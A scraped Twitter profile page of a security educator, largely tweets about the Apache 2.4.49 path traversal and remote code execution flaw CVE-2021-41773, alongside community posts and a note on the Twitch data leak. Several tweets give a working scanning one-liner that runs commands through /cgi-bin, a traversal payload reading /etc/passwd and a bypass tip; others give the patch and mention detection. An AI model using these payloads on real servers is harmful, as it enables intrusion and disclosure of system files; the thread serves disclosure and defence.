Rohit Gautam   

@HackerGautam

Founder I talk and teach building constructive capacity/workforce in cyber security.

Open Source Community
Joined August 2012

Tweets

You blocked @HackerGautam

Are you sure you want to view these Tweets? Viewing Tweets won't unblock @HackerGautam

  1. Pinned Tweet
    Undo
  2. CVE-2021-41773 🧵👇 1.Apache 2.4.48 and earlier ✅ 2.Apache 2.4.50 ✅ 3. Apache 2.4.49 + Require all denied ✅ 4.Apache 2.4.49 + Require all denied comment-out = Path traversal 🔥 5.Apache 2.4.49 + Require all denied comment-out + mod_cgi enabled = RCE🔥🔥

    Undo
  3. Undo
  4. Undo
  5. Questions. No Questions are stupid, lame or funny. Ask them, It might help out alot of others but be respectful. 💯❤️

    Undo
  6. So I just phrased this. Communication is the key. Express yourself.🤗 Communicate well in the community and make your comments commute better to every person coming in your way completely. ❤️💯

    Undo
  7. Disagree. Nice people become coders. Nicer people to understand the code and find flaws into it become hackers😇

    Undo
  8. Twitch source code and financial data was leaked on 4chan today. Someone on 4chan said Twitch is Open source now. ➡️ What you can do? ✅ Change Passwords ✅ Apply MFA ✅ Retweet this.

    Undo
  9. Update: CVE-2021-4177🔥 ➡️Apache 2.4.49 Path Traverse / RCE ✅Use: /icons instead of just /cgi-bin Seeing this activity already in wild.

    Undo
  10. Twitch (owned by Amazon) has allegedly been hacked and data leaked. I mean a lot of things already happened this week please.

    Undo
  11. Update : CVE-2021-41773 POC as RCE 🔥👇💥 ✅One Liner: cat file | while read host do ; do curl --silent --path-as-is --data "echo;id" '$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' | grep "uid" && echo "$host \033[0;31mVuln\n"|| echo "$host \033[0;32mNot\n";done

    Undo
  12. Undo
  13. This Payload also works. localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd

    Undo
  14. Taking some constructive feedbacks for an organisation. If we started a bug bounty program💰. What are something you would suggest?

    Undo
  15. Undo
  16. Show this thread
    Undo
  17. Undo
  18. ✅Patch Available : Update to Apache 2.4.50

    Show this thread
    Undo
  19. ✅Fix: Do not hide your banner messages to avoid fingerprinting. Sigma Rule for detection -

    Show this thread
    Undo
  20. Show this thread
    Undo

Loading seems to be taking a while.

Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.

    You may also like

    ·